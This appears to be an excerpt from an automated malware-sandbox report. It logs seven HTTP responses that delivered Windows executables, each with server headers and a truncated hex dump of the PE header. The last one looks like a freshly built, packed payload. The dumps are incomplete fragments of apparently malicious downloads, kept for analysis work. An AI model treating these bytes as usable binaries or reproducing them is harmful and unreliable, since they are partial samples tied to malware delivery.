Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 06:26:34 GMTContent-Type: application/octet-streamContent-Length: 1867264Last-Modified: Tue, 02 Jul 2024 05:44:13 GMTConnection: keep-aliveETag: "668393ad-1c7e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 20 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 4a 00 00 04 00 00 aa c5 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 03 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 03 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 74 78 6f 78 61 6e 7a 00 70 19 00 00 a0 30 00 00 66 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 72 6c 72 63 6e 66 6c 00 10 00 00 00 10 4a 00 00 04 00 00 00 58 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 4a 00 00 22 00 00 00 5c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
